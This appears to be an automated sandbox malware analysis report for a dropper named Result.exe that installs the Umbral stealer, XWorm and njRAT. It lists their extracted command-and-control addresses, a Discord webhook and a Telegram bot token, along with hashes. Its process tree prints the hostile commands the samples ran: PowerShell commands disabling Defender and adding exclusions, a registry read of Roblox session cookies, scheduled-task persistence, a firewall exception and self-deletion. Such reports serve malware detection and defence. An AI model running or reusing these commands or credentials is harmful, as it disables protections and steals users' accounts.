Analysis

  • max time kernel
    600s
  • max time network
    598s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    27-04-2024 15:25

General

  • Target

    Result.exe

  • Size

    422KB

  • MD5

    d4a25a5c3c21cb009ce03b1679f792f1

  • SHA1

    58c1759d4f82240d90cc9c5fb4a9f2f6d7dbc6a4

  • SHA256

    c1032817c3b6733dccbfe475c4ab3313981410387f518ae06cbbfcf7a51674c6

  • SHA512

    4feee7be209d0a7d6f7e005005af8a49f578c12dee9941f743513ac065e5b89e2e3ca3cbea2288d3150ceb0f8b782665429a7dcc046be93bcd109deaddb24d95

  • SSDEEP

    12288:YoZRL+EP8DDUgoOJBiLHaIJtMQIL/57qDYHN:8I8HUgoOJBiLHaIJtMQK7N

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Extracted

Family

njrat

Version

0.7d

Botnet

Paxankor

C2

hakim32.ddns.net:2000

phentermine-partial.gl.at.ply.gg:36969

Mutex

9e134de821c32c6ed483f39ec83528df

Attributes
  • reg_key

    9e134de821c32c6ed483f39ec83528df

  • splitter

    |'|'|

Signatures

  • Detect Umbral payload 5 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 6 IoCs
  • Executes dropped EXE 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Result.exe
    "C:\Users\Admin\AppData\Local\Temp\Result.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
          4⤵
          • Views/modifies file attributes
          PID:4592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4716
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          PID:2732
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          PID:2288
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          PID:4248
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:3104
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4648
          • C:\Windows\system32\PING.EXE
            ping localhost
            5⤵
            • Runs ping.exe
            PID:4732
      • C:\Users\Admin\AppData\Local\Temp\XClient.exe
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4544
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
          4⤵
          PID:1220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          PID:420
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
          4⤵
          PID:4400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
          4⤵
          PID:4512
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
          4⤵
          • Creates scheduled task(s)
          PID:4352
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3200
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        PID:1652
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    PID:4600
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    PID:2288
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:1548
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:2528
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:3708
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:3436
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:3760
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:4124
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:4520
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:1220
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:4204
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:656

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

    Filesize

    654B

    MD5

    16c5fce5f7230eea11598ec11ed42862

    SHA1

    75392d4824706090f5e8907eee1059349c927600

    SHA256

    87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

    SHA512

    153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    ad5cd538ca58cb28ede39c108acb5785

    SHA1

    1ae910026f3dbe90ed025e9e96ead2b5399be877

    SHA256

    c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

    SHA512

    c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    5a9b97538363bc5ab5f3d92352560061

    SHA1

    70815f2fbacb2fd9a59fadb9110ec2d96b8ef533

    SHA256

    4e00cb8ba8e2f1b9c9fb7c1af39f1bfcfaf32f9f2e476ff3897ee17bc477b23c

    SHA512

    7974155b3ea099fee0ac3e12ffe5a3427ef2fdd448b5cfe9c17a4af399db9a84e48abe73b9b7bc6d66e7e5774d1e6c15d3135540aa4085973408b41db6b45ff4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8c5fff2c090f31e158e97938c720ee9f

    SHA1

    324055be6148591f0928ce320b6c325b3f8bb0a8

    SHA256

    700f8375b5760e1c4c2eedd335fe3dc1097281424b52a8f9e918d0a78dcb65b5

    SHA512

    0502bc8345c14c0ced566a9afc8210172f49c48cb1c551fb27105311498e79e03b634fbcbbd4a5ce09490b1ca052e813b68d18e93e215ddae3fb983616a29ea3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f3bde5dba3f8b6083eec8169823ce3a3

    SHA1

    1a4581fd14a07f64075d90791a25959e8afae332

    SHA256

    1266b3e994f64e316900166fd67d5d1bd58b35ed4ef52dda31b9a97cbf482678

    SHA512

    210670295949ae8733e79e10494f723728cd7bf9560636f397d0f966282d3619b234f2886c2f9eea1f2021b3b7bd28347d813d45915d04bd8269a67df920cea1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    59649da1edf059761abb0865a6a4785f

    SHA1

    142dc13d01a0f4919704e7b42e2bc0b2d80068ff

    SHA256

    27678235ba9f6202a0788bb00e673ef29c129d1f7ed39c6b3711a9152cd0f8ff

    SHA512

    b8ca5e8039ad28f11bd4aa674deea7b810bd4934b90ff703a1b89f713bfad1444b82924cda5a0ac0a008294ef72d1dc58c29f1eb809f61f24c59e4b26622ee3a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    86145a4983c4d894c0c9dd9e4ff0f009

    SHA1

    a8e43fd7b070bc11476242e1f2714f54dcbc8276

    SHA256

    ff54b5d1dc749af3a3d46b39d5feeba746aa89bf3810a093cf5aa8259866a620

    SHA512

    124159cd441b05d456f38e38329a14503c6cd59d48fffa30c32f71a0fd11b1d820297ade894ec6667ba8460115a05305a7e1aae6004f18f9ca24713cbc98dd0f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    d928f90923f5ff9d64502694f33643fd

    SHA1

    e6b682eda4540554b331988e3d84d41c49084490

    SHA256

    e72f59277c81b40e98abf39268d6eed8dbbf1c8e092e224df750e8e136a2784a

    SHA512

    476f2ae43e6a70a0bf92754945b1d757c0d5b421e80d09e3ecdcb80baf3a2a6b9dec226c91f0e0f8cbb23e59197fa734459942116dd59b084353c36438082f50

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f4cebace363955b5fb79b606d1252b9e

    SHA1

    f57eb08ca60074896c6d65c98e2f8b99450f7aee

    SHA256

    ba0bf3227005c611f8d0d8ad6c73089c086e94019641f0fc14a303c760b6928a

    SHA512

    5d63af7b9754546535b86504494ffc6eb0ad79653f148ce4a2e9199badbdf582fac30c31dfeecf79b9d67b21b779d5e4132da8884e1d365c1ca380c719f1a52f

  • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe

    Filesize

    319KB

    MD5

    f69924b642ac4b9ef1dfacdfd43759a9

    SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

    SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

    SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • C:\Users\Admin\AppData\Local\Temp\Server.exe

    Filesize

    93KB

    MD5

    ba71f783926cbda30d8ff8f295fdd312

    SHA1

    bd533cc6457836098ff34d07ab2ef6b04ef144b9

    SHA256

    c6caa8ccc6ac706820712f93ea3a2541da32ec04542b3b7a85d8d85b0f0e1831

    SHA512

    19767768012b07f3a13dc3e3652c9c3b6376d3ec6199ad384f7011f6db3c6b2e11bff86979d0475a7b58e84e100126661954a667a8217655439aff73b374d5c9

  • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

    Filesize

    229KB

    MD5

    7a902c87a60986f18a6b097712299256

    SHA1

    2c01906a39faa9d27a41e0d3cd84e92410b9c483

    SHA256

    e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

    SHA512

    c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe

    Filesize

    80KB

    MD5

    3fc932775533f1bcea180de679a902dd

    SHA1

    3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

    SHA256

    09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

    SHA512

    f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oul5lr4x.ghl.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/1412-10-0x0000000000400000-0x0000000000471000-memory.dmp

    Filesize

    452KB

  • memory/2016-22-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/3200-24-0x00000000031B0000-0x00000000031C0000-memory.dmp

    Filesize

    64KB

  • memory/3200-395-0x00000000031B0000-0x00000000031C0000-memory.dmp

    Filesize

    64KB

  • memory/4212-33-0x0000013F6E7A0000-0x0000013F6E816000-memory.dmp

    Filesize

    472KB

  • memory/4212-30-0x0000013F6E5E0000-0x0000013F6E602000-memory.dmp

    Filesize

    136KB

  • memory/4544-23-0x0000000000F70000-0x0000000000F8A000-memory.dmp

    Filesize

    104KB

  • memory/4544-409-0x0000000001650000-0x000000000165C000-memory.dmp

    Filesize

    48KB

  • memory/4580-124-0x000001D56F9D0000-0x000001D56F9EE000-memory.dmp

    Filesize

    120KB

  • memory/4580-123-0x000001D571310000-0x000001D571360000-memory.dmp

    Filesize

    320KB

  • memory/4580-188-0x000001D5712C0000-0x000001D5712CA000-memory.dmp

    Filesize

    40KB

  • memory/4580-189-0x000001D5712F0000-0x000001D571302000-memory.dmp

    Filesize

    72KB

  • memory/4580-21-0x000001D56F530000-0x000001D56F570000-memory.dmp

    Filesize

    256KB